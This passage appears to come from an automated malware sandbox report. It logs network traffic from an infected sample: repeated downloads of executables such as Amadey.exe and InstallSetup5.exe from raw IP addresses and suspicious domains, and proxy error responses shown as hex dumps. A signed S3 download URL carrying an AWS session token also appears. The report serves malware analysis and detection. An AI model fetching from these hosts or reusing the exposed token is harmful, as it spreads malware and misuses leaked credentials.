/fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.com
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.org
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.su
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.org
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: OS X; U; en) Presto/2.6.30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: internal error: handshake returned an error but is marked successfultls: received unexpected handshake message of type %T when waiting for %T equals www.facebook.com (Facebook)
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: o Debian/1.6-7Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916 equals www.facebook.com (Facebook)
                  Source: unknownDNS traffic detected: queries for: github.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:37 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 02:30:38 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 11 Mar 2024 02:30:37 GMTserver: istio-envoyconnection: closecontent-length: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 02:30:38 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:38 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 02:30:38 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 02:30:38 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Mar 2024 02:30:38 GMTContent-Length: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 02:30:38 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:39 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 